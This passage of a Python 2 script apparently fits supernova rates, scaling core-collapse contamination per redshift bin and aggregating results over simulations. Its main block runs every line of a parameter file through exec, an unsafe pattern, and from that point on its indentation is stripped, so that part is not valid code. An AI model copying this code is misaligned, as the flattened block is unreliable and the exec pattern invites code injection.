        #ddNIa = np.sqrt(histSAllIa)*R/(tempSimCC.shape[0] - R*histSAllCC)
        ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - allSimIaZbin.shape[0]*R)/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2
        ddNCC = np.sqrt(allSimCCZbin.shape[0])*R*(allSimIaZbin.shape[0]*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2
        ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])
        ddNIa = np.sqrt(allSimIaZbin.shape[0])*R/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])
        #ddR = (histSAllIa*tempSimCC.shape[0] - histSAllCC * tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2
        dS = np.sqrt(ddnCC**2 + ddNCC**2 + ddnIa**2 + ddNIa**2)# + ddR**2)
        if debug:
            print "ddnCC"
            print ddnCC
            print "ddNCC"
            print ddNCC
            print "ddnIa"
            print ddnIa
            print "ddNIa"
            print ddNIa
            #print "ddR"
            #print ddR
            print "Delta S"
            print dS
        #assert(S > 0)
        # Unphysical (negative) or undefined scales fall back to 1.0.
        if S < 0:
            S = np.nan
        if np.isnan(S):
            print 'SCALE IS NAN'
            if len(CCScales) > 0:
                #CCScales.append(CCScales[-1])
                CCScales.append(1.0)
            else:
                CCScales.append(1.0)
        else:
            CCScales.append(S)
        # dS may come back as an array (ndarray arithmetic) or scalar; NaN
        # errors are replaced by 1.0 either way.
        if type(dS) == np.ndarray:
            if np.isnan(dS[0]):
                CCScaleErrs.append(1.0)
            else:
                CCScaleErrs.append(dS[0])
        else:
            if np.isnan(dS):
                CCScaleErrs.append(1.0)
            else:
                CCScaleErrs.append(dS)
        #if debug:
        #    print "CC PlotDebug"
        #    print (simBinsCC[1:] + simBinsCC[:-1])/2.0
        #    print simHistCC
        #    print CCScales[0]
        #    print dS
        #    print fnorm2
        #    print histD
        #    print (muresBins[1:] + muresBins[:-1])/2.0
        #if simInd ==1:
        #    plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, simHistCC*fnorm2, c = 'b', where = 'mid', label = 'prescaled Sim CC')
        #    plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, CCScales[0]*simHistCC*fnorm2, c = 'g', where = 'post', label = 'postscaledSimCC')
        #    plt.step((muresBins[1:] + muresBins[:-1])/2.0, histD, c = 'r', where = 'mid', label = 'data')
        #    plt.legend()
        #    plt.savefig(outfilePrefix + 'ScaledHist.png')
        #    plt.clf()
    if debug:
        print "CCScaleErrs"
        print CCScaleErrs
    if returnHist:
        return CCScales, CCScaleErrs, simIaHists, simCCHists, dataHists
    return CCScales, CCScaleErrs
def applyCCScale(NCC, CCScales, CCScaleErrs, datazbins = None, zbins = None):
    """Apply the per-z-bin CC scale factors to the binned CC counts NCC.

    A single scale (scalar, or length-1 array) multiplies NCC directly.
    Multiple scales are interpolated onto the data binning with an
    error-weighted UnivariateSpline (scipy, imported at file level --
    TODO confirm) evaluated at the data bin centers; in that case both
    datazbins and zbins are required.

    Returns the scaled counts, clipped to be non-negative.

    NOTE(review): NaN entries in CCScales/CCScaleErrs are patched to 1.0
    in place, mutating the caller's arrays.
    """
    if not(zbins is None):
        zbins = np.array(zbins)
    if not (datazbins is None):
        datazbins = np.array(datazbins)
    if type(CCScaleErrs) == list:
        CCScaleErrs = np.array(CCScaleErrs)
    if type(CCScales) == list:
        CCScales = np.array(CCScales)
    print 'CCScaleErrs'
    print CCScaleErrs
    print datazbins
    print zbins
    if type(CCScales) == np.ndarray:
        if CCScales.shape[0] == 1:
            # One global scale: no interpolation needed.
            NCCScaled = CCScales[0]*NCC
        else:
            if (datazbins is None) | (zbins is None):
                assert(0)  # interpolation requires both binnings
            # Spline degree capped at 3 and at (npoints - 1).
            if CCScales.shape[0] < 4:
                k = CCScales.shape[0] -1
            else:
                k = 3
            # Patch NaNs (failed scale fits) to a neutral 1.0 before splining.
            nancond = np.isnan(CCScales)
            if np.sum(nancond) > 0:
                CCScales[nancond] = 1.
                CCScaleErrs[nancond] = 1.
            zCenters = (zbins[1:]+ zbins[:-1])/2.0
            print zCenters
            print CCScales
            #spline = UnivariateSpline(zbins, CCScales, w = 1.0/CCScaleErrs, k = k)
            # Inverse-error weighting so poorly measured bins pull less.
            spline = UnivariateSpline(zCenters, CCScales, w = 1.0/CCScaleErrs, k = k)
            print datazbins.shape
            print datazbins
            print NCC.shape
            datazcents = (datazbins[1:]+ datazbins[:-1])/2.0
            NCCScaled = spline(datazcents)*NCC
    elif (type(CCScales) == int) | (type(CCScales) == float):
        NCCScaled = CCScales*NCC
    else:
        assert(0)  # unsupported CCScales type
    # Spline extrapolation can go negative; clamp and sanity-check.
    NCCScaled = NCCScaled.clip(0)
    print NCCScaled
    assert(not bool(np.sum(NCCScaled < 0)))
    return NCCScaled
if __name__ == '__main__':
from sys import argv
print "argv"
print argv
datadir = argv[1]
simdir = argv[2]
dataname = argv[3]
print "dataname"
simname = argv[4]
print simname
simgenfile = argv[5]
print simgenfile
NNCut = False
cheatType = bool(int(argv[6]))
cheatZ = bool(int(argv[7]))
trueBeta = float(argv[8])
paramFile = argv[9]
cutFiles = [argv[10]]
try:
debug = bool(int(argv[11]))
except:
debug = False
#if( ('Combine' in simdir) or ('SALT2' in simdir)) & (('Combine' in datadir) or ('SALT2' in simdir)):
#NNCut = True
#NNProbCut = 0.95
#if len(argv) > 6:
# NNCut = True
# NNProbCut = 0.9
# NNData = argv[6]
# NNSim = argv[7]
#default params
zminFit = 0.1
zmaxFit = 1.2
zminSamp = 0.1
zmaxSamp = 1.2
MJDMin = 0.0
MJDMax = np.inf
bins = "equalSize"
runFit = True
fracContamCuts = [-1]
fixBeta = True
fixK = False
nbins = None
binList = None
ScaleMuResCutLow = -1
ScaleMuResCutHigh = 1
#muresBins = 1
muresBinsLow = 3
muresBinsHigh = 3
scaleZBins = [0.0, 1.2]
nScaleZBins = None
cheatCCSub = False
cheatCCScale = False
ZSysFlag = False
Blind = False
Rate_Model = 'powerlaw'
MURESCuts = 2.0 #[(0.0, 0.8, -0.5, 0.5), (0.8, 1.5, -1, 1)]
noCCMC = False
fixCCScale = False
trueMCBeta = 1.65
trueMCK = 1.97E-5
priorRate = None
priorZEff = None
ratePriorErrUp = None
ratePriorErrDown =None
ratePriorErrAll = None
priors = None
#override file
params = open(paramFile, 'r').readlines()
for p in params:
print p
exec(p)
if nScaleZBins is None :
redoScaleZBinFlag = False
else:
redoScaleZBinFlag = True
if not(priors is None):
if len(priors) == 3:
priorRate, priorZEff, ratePriorErrAll = priors
ratePriorErrUp = None
ratePriorErrDown = None
elif len(priors) == 4:
priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown = priors
ratePriorErrAll =None
cosVal = 47392945716038.134971247
kmean = []
ksigma = []
kErr = []
BetaMean = []
#BetaWeightMean = []
#KWeightMean = []
BetaSigma= []
BetaErr = []
zBreakMeans = []
zBreakSigmas =[]
zBreakErrs = []
Chi2Mean = []
Chi2Sigma = []
f_JStorage = []
f_JErrStorage = []
SampleSizes = []
CCScaleStorageGlobal = []
CCScaleErrStorageGlobal = []
#MURES_Cuts = [2.0]
#MURES_Cuts = [1.0, 1.5, 2.0, 3.0, 4.0, 99.0, 2.0]
#for MURES_Cut in MURES_Cuts:
fcc = -1
for cf in cutFiles:
cuts = [] # cuts = [('FITPROB', 0.01, np.inf), ('NN_PROB_IA', NNProbCut, np.inf)]
cutlist = open(cf, 'r').readlines()
for l in cutlist:
spl = l.split()
cuts.append(('{0}'.format(spl[0]), float('{0}'.format(spl[1])), float('{0}'.format(spl[2]))))
ks = []
kErrs = []
Betas = []
BetaErrs = []
zBreaks =[]
zBreakErrs = []
Chi2s = []
CCScaleStorage = []
CCScaleErrStorage = []
nFail = 0
simLoaded = False
#print "FUCK MPI"
#if Rate_Model == 'discrete':
# subprocess.call(['python', 'constructChi2Func.py', str(nbins)], shell = False)
#print "MPI Fucked"
if '{' in datadir:
if os.path.exists(datadir.format(98)):
print "MOAR SIMS"
nfile = 101
else:
print "FEWAR SIMS"
nfile = 49
else:
nfile = 2
for simInd in range(1,nfile):
#print "Sim {0}".format(simInd)
#SimBeta = 2.1 # simdir.split('_')[-3]
#SimR0 = 1.7*10**-5 #simdir.split('_')[-5]
#print "Sim R0 = {1}; Sim Beta = {0}".format(SimBeta, SimR0)
print datadir.format(simInd)
if simLoaded:
try:
RateTest.newData(datadir.format(simInd), dataname.format(simInd), simInd =simInd)
if ZSysFlag:
assert(0)
RateTest.zSystematic(nbins = nbins, binList = binList)
if redoScaleZBinFlag:
RealCat = RateTest.postCutRealCat
RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)]
zArray =RealOutlierCat[RateTest.ztype]
zArray.sort()
splitZs = np.array_split(zArray, nScaleZBins)
#[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]]
scaleZBins = [splitZs[0][0]]
for i in range(1,nScaleZBins):
scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0)
scaleZBins.append(splitZs[i][-1])
#RateTest.effCalc(nbins = nbins, fracContamCut = fcc, simInd =simInd)
#RateTest.effCalc(nbins = 20)
BetaIter = []
BetaErrIter = []
CCIter = []
CCErrIter = []
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind)
if Rate_Model != 'discrete':
if Blind:
print "Blinding A"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
for iteration in range(nIter):
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(0.0)
CCErrIter.append(0.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(1.0)
CCErrIter.append(0.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)
if Blind:
print "Blinding b"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
else:
CCIter.append(1.0)
CCErrIter.append(0.0)
print "CCScale Progression"
print CCIter
print "CCScale Err Progression"
print CCErrIter
if Rate_Model != 'discrete':
print "Beta Progression"
print BetaIter
print "Beta Err Progressions"
print BetaErrIter
print "Mean Betas"
print np.nanmean(BetaIter)
print "Mean CCScales"
print np.nanmean(CCIter)
else:
f_JStorage.append(RateTest.fJList)
f_JErrStorage.append(RateTest.fJErrList)
#print "AAA CC Scales"
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
print CCScale
CCScaleStorage.append(CCScale)
CCScaleErrStorage.append(CCScaleErr)
else:
CCScaleStorage.append(0.0)
CCScaleErrStorage.append(1.0)
else:
CCScaleStorage.append(1.0)
CCScaleErrStorage.append(1.0)
ks.append(RateTest.k)
kErrs.append(RateTest.kErr)
if Blind:
print "Blinding c"
Betas.append(RateTest.Beta+ np.cos(cosVal))
else:
Betas.append(RateTest.Beta)
BetaErrs.append(RateTest.BetaErr)
if Rate_Model == 'brokenpowerlawVar':
zBreaks.append(Rate_Fitter.zBreak)
zBreakErrs.append(Rate_Fitter.zBreakErr)
Chi2s.append(RateTest.chi2)
print "CCScale Storage Iter {0}".format(simInd)
print CCScaleStorage
if not noCCMC:
print CCScale
print CCScale[0]
dnamestr = datadir.format(simInd)
cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz'
#if saveCuts:
# np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s')
lowzCut = zminFit
highzCut = zmaxFit
SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0])
if saveCuts:
np.savetxt(cutdnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt='%s')
#with open(cutdnamestr, 'rb') as f_in:
# with gzip.open(cutdnamestr + '.gz', 'wb') as f_out:
# shutil.copyfileobj(f_in, f_out)
except Exception, e:
print "FAILURE"
print e
traceback.print_exc()
nFail +=1
else:
try:
RateTest = Rate_Fitter(datadir.format(simInd), dataname.format(simInd), simdir, simname,simgenfile, trueMCBeta, trueMCK, zminSamp =zminSamp, zmaxSamp =zmaxSamp, zminFit =zminFit, zmaxFit =zmaxFit, cheatZ = cheatZ, cheatType = cheatType, cuts = cuts, cheatCCSub = cheatCCSub, cheatCCScale = cheatCCScale, Rate_Model = Rate_Model, MURESCuts = MURESCuts, noCCMC = noCCMC, priorRate = priorRate, priorZEff = priorZEff, ratePriorErrUp = ratePriorErrUp, ratePriorErrDown =ratePriorErrDown, ratePriorErrAll = ratePriorErrAll)# , MJDMin = 0, MJDMax = np.inf)
if ZSysFlag:
RateTest.zSystematic(nbins = nbins, binList = binList)
simLoaded = True
RateTest.effCalc(nbinsSamp = nbinsSamp,nbinsFit = nbinsFit, fracContamCut = fcc)
#RateTest.effCalc(nbins = 20)
BetaIter = []
BetaErrIter = []
CCIter = []
CCErrIter = []
if redoScaleZBinFlag:
RealCat = RateTest.postCutRealCat
RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)]
zArray =RealOutlierCat[RateTest.ztype]
zArray.sort()
print 'zArray'
print zArray
print 'nScaleZBins'
print nScaleZBins
splitZs = np.array_split(zArray, nScaleZBins)
#[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]]
scaleZBins = [splitZs[0][0]]
for i in range(1,nScaleZBins):
scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0)
scaleZBins.append(splitZs[i][-1])
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind)
if Rate_Model != 'discrete':
if Blind:
print "Blinding d"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
for iteration in range(nIter):
print "interation Number"
print iteration
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(0.0)
CCErrIter.append(1.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(1.0)
CCErrIter.append(1.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)
if Rate_Model != 'discrete':
if Blind:
print "Blinding e"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
if Rate_Model != 'discrete':
print "Beta Progression"
print BetaIter
print "Beta Err Progressions"
print BetaErrIter
print "Mean Betas"
print np.nanmean(BetaIter)
else:
f_JStorage.append(RateTest.fJList)
f_JErrStorage.append(RateTest.fJErrList)
print "CCScale Progression"
print CCIter
print "CCScale Err Progression"
print CCErrIter
print "Mean CCScales"
print np.nanmean(CCIter)
if not fixCCScale:
if not noCCMC:
print "AAA CC Scales"
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, f_Js =RateTest.fJList, Rate_Model = Rate_Model, simInd = simInd, debug = debug, ztype = RateTest.ztype)
print 'CC Scale'
print CCScale
CCScaleStorage.append(CCScale)
CCScaleErrStorage.append(CCScaleErr)
else:
CCScaleStorage.append(0.0)
CCScaleErrStorage.append(1.0)
else:
CCScaleStorage.append(1.0)
CCScaleErrStorage.append(1.0)
dnamestr = datadir.format(simInd)
cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz'
np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s')
#with open(cutdnamestr, 'rb') as f_in:
# with gzip.open(cutdnamestr + '.gz', 'wb') as f_out:
# shutil.copyfileobj(f_in, f_out)
cutsnamestr = simname.split('.')[0] + '+CUTS.FITRES.gz'
np.savetxt(cutsnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt = '%s')
lowzCut = zminFit
highzCut = zmaxFit
SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0])
#with open(cutsnamestr, 'rb') as f_in:
# with gzip.open(cutsnamestr + '.gz', 'wb') as f_out:
# shutil.copyfileobj(f_in, f_out)
ks.append(RateTest.k)
kErrs.append(RateTest.kErr)
if Rate_Model != 'discrete':
if Blind:
print "Blinding f"
Betas.append(RateTest.Beta+ np.cos(cosVal))
else:
Betas.append(RateTest.Beta)
BetaErrs.append(RateTest.BetaErr)
if Rate_Model == 'brokenpowerlawVar':
zBreaks.append(Rate_Fitter.zBreak)
zBreakErrs.append(Rate_Fitter.zBreakErr)
Chi2s.append(RateTest.chi2)
print "CCScale Storage Iter {0}".format(simInd)
print CCScaleStorage
if not noCCMC:
print CCScale
print CCScale[0]
if Rate_Model != 'discrete':
if np.isnan(RateTest.Beta):
nFail +=1
except Exception, e:
print "FAILURE"
print e
traceback.print_exc()
nFail +=1
#if Blind:
# Betas = np.array(Betas) + np.cos(47392945716038.134971247)
print "Number of Failures"
print nFail
if Rate_Model != 'discrete':
badSims = np.invert(np.isfinite(Betas) & (BetaErrs > 0) & np.isfinite(ks) & (kErrs > 0))
mBetas = ma.masked_array(Betas, mask=badSims)
mBetaErrs = ma.masked_array(BetaErrs, mask=badSims)
mks = ma.masked_array(ks, mask=badSims)
mkErrs = ma.masked_array(kErrs, mask=badSims)
print "mean k"
print np.nanmean(ks)
print "mean kerrs"
print np.nanmean(kErrs)
print "std. k"
print np.nanstd(ks)
print "Mean beta"
print np.nanmean(Betas)
print "Mean betaerrs"
print np.nanmean(BetaErrs)
print "std. beta"
print np.nanstd(Betas)
if len(Betas) == 1:
kmean.append(ks[0])
ksigma.append(0.0)
kErr.append(kErrs[0])
BetaMean.append(Betas[0])
BetaSigma.append(0.0)
BetaErr.append(BetaErrs[0])
else:
print "test here"
print ks
print mks
print Betas
print mBetas
print 'end test here'
kmean.append(np.average(mks, weights = 1.0/mkErrs**2))
ksigma.append(np.std(mks))
kErr.append(np.mean(mkErrs))
BetaMean.append(np.average(mBetas, weights = 1.0/mBetaErrs**2))
#BetaWeightMean.append(np.average(Betas, weights = 1.0/ma.masked_invalid(BetaErrs)**2))
#KWeightMean.append(np.average(ks, weights = 1.0/ma.masked_invalid(kErrs)**2))
BetaSigma.append(np.std(mBetas))
BetaErr.append(np.mean(mBetaErrs))
else:
print "mean f_Js"
print np.nanmean(f_JStorage, axis =0)
print "mean f_JErrs"
print np.nanmean(f_JErrStorage, axis =0)
if Rate_Model == 'brokenpowerlawVar':
zBreakMeans.append(np.nanmean(zBreaks))
zBreakSigmas.append(np.nanstd(zBreaks))
Chi2Mean.append(np.nanmean(Chi2s))
Chi2Sigma.append(np.nanstd(Chi2s))
#if simInd == 1:
print "Indiv Chi2s"
print Chi2s
bins0 = np.linspace(1.0, 20.0, 10)
hist, bins = np.histogram(Chi2s, bins = bins0)
xs = (bins[1:] + bins[:-1])/2.0
plt.bar(xs, hist, width = bins[1:] - bins[:-1])
print "Chi2 Hist"
print bins
print hist
chi2s = scipy.stats.chi2.pdf(xs, nbinsFit - 2)
norm = np.max(hist)*1.0/np.max(chi2s)
plt.plot(xs, chi2s*norm, color = 'g')
if cheatType and not cheatZ:
plt.savefig(dataname +'Chi2Plot_CheatType.png')
elif cheatZ and not cheatType:
plt.savefig(dataname +'Chi2Plot_CheatZ.png')
elif cheatZ and cheatType:
plt.savefig(dataname +'Chi2Plot_CheatTypeZ.png')
else:
plt.savefig(dataname +'Chi2Plot.png')
if not noCCMC:
print "AAA CC Scale means (weighted, unweighted)"
#print np.average(ma.masked_invalid(np.array(CCScaleStorage)),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)
#print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)), axis = 0)
#print CCScaleStorage
#print CCScaleErrStorage
print np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)
print np.nanmean(np.array(CCScaleStorage), axis = 0)
print "AAA CC Scale stds"
print np.nanstd(np.array(CCScaleStorage), axis = 0)
CCScaleStorageGlobal.append(CCScaleStorage)
print "All Betas"
print Betas
if cheatType:
print "THESE RESULTS ONLY INCLUDE TRUE Ias BECAUSE WE CHEATED AND USED THE SIM INFORMATION"
if cheatZ:
print "THESE RESULTS Use Simulated Redshift info"
'''
print "lengths of lists"
print len(RateTest.globalNDataStorage)
print len(RateTest.globalChi2Storage)
print len(RateTest.globalZPhotBinStorage)
print len(RateTest.globalNDataIaPhotBinStorage)
plt.clf()
plt.scatter(RateTest.globalNDataStorage, RateTest.globalChi2Storage)
plt.xlabel('nData')
plt.ylabel('chi2 in bin')
string = ''
if cheatType: string += 'CheatType'
if cheatZ: string += 'CheatZ'
print 'string here'
print string
plt.savefig(RateTest.realName + 'Chi2VsnData' + string +'.png')
plt.clf()
plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalChi2Storage)
plt.xlabel('zPhot bin center')
plt.ylabel('chi2 in bin')
plt.savefig(RateTest.realName + 'Chi2VsZPhot' + string +'.png')
plt.clf()
plt.clf()
plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataIaPhotBinStorage, s = 1, c = 'r', label = 'Type Ia Data, zPhot')
plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataCCPhotBinStorage, s = 1, c = 'b', label = 'CC Data, zPhot')
plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataIaTrueBinStorage, s = 1, c = 'Pink', label = 'Type Ia Data, zTrue')
plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataCCTrueBinStorage, s = 1, c = 'Cyan', label = 'CC Data, zTrue')
plt.yscale('log')
plt.xlabel('redshift either true or phot')
plt.legend()
plt.savefig(RateTest.realName + 'AggregateZDistro' + string +'.png')
'''
#print "MURES CUTS"
#print MURES_Cuts
print "Frac Contam Cuts"
print fracContamCuts
if Rate_Model != 'discrete':
print "Kmeans"
print kmean
print "Ksigmas"
print ksigma
print "BetaMeans"
print BetaMean
print "BetaSigmas"
print BetaSigma
print "BetaErrs"
print BetaErr
else:
print "f_J mean unweighted"
print np.mean(f_JStorage, axis = 0)
print "f_J mean weighted"
print np.average(f_JStorage, weights = 1.0/(np.array(f_JErrStorage))**2, axis = 0)
print "f_J Errors"
print np.mean(f_JErrStorage, axis = 0)
if Rate_Model == 'brokenpowerlawVar':
print "mean powerlaw break z"
print zBreakMeans
print "st. dev powerlaw break z"
print zBreakSigmas
print "Chi2Means"
print Chi2Mean
print "Chi2Sigma"
print Chi2Sigma
assert(fracContamCuts[0] == -1)
outfile = dataname
if Rate_Model != 'discrete':
print "outfile Pre Prefix"
print outfile
if cheatType:
outfile = outfile + '_CheatType'
if cheatZ:
outfile = outfile + 'Z'
elif cheatZ:
outfile = outfile + '_CheatZ'
outfile1 = outfile + '.txt'
outfile2 = outfile + '-IndivBetaK.txt'
output2 = open(outfile2, 'w')
output2.write('i Beta_i k_i BetaErr_i kErr_i\n')
for i, b, k, berr, kerr in zip(range(len(Betas)),Betas, ks, BetaErrs, kErrs):
output2.write('{0} {1:.4f} {2:.4f} {3:.4f} {4:.4f}\n'.format(i, b, k, berr, kerr))
output2.close()
print "Outfile Name"
if not(os.path.isfile(outfile1)):
output = open(outfile1, 'w')
output.write('#Date Date/time at which job finished\n')
output.write('#DataBeta Input beta for the simulated data sample. Will be 0.0 for real data.\n')
output.write('#N_sims Number of datalike sims that go into the subsequent means\n')
output.write('#SampleSize Mean Number of Events in data post cut\n')
output.write('#delta_Beta mean difference between large MC sim beta (2.11 for the time being) and the measured beta for the data (not the beta in column 2.\n')
output.write('#sigma_Beta stdev of delta_Beta over N_sims sims\n')
output.write('#BetaStdErr std. error in the mean of delta_Beta over N_sims sims\n')
output.write('#Beta_err mean statistical error on beta\n')
output.write('#K mean ratio between large MC sim K (1.7E-5 for the time being) and the measured K for the data \n')
output.write('#sigma_K stdev of K over N_sims sims\n')
output.write('#KStdErr std. error in the mean of K over N_sims sims\n')
output.write('#KStaterr mean statistical error on K\n')
output.write('#meanZ mean photoZ of the large MC sim\n')
output.write('#sigmaZ std. deviation of the photoZs for the large Sim\n')
output.write('#sigmaDZ std. deviation of (zSim - zPHOT)\n')
output.write('#NCC/NTotScaled overall CC Contamination after adjusting CC Frac to data\n')
output.write('#NCC/NTot overall CC Contamination in sim only\n')
output.write('#CCScales relative sim vs. CC rate in z-bins \n')
output.write('#TypeChoice Internal Diagnostic, check code comments\n')
output.write('#NNProbCut Threshold for NN probability of Ia\n')
output.write('#NBins Number of Analysis Bins\n')
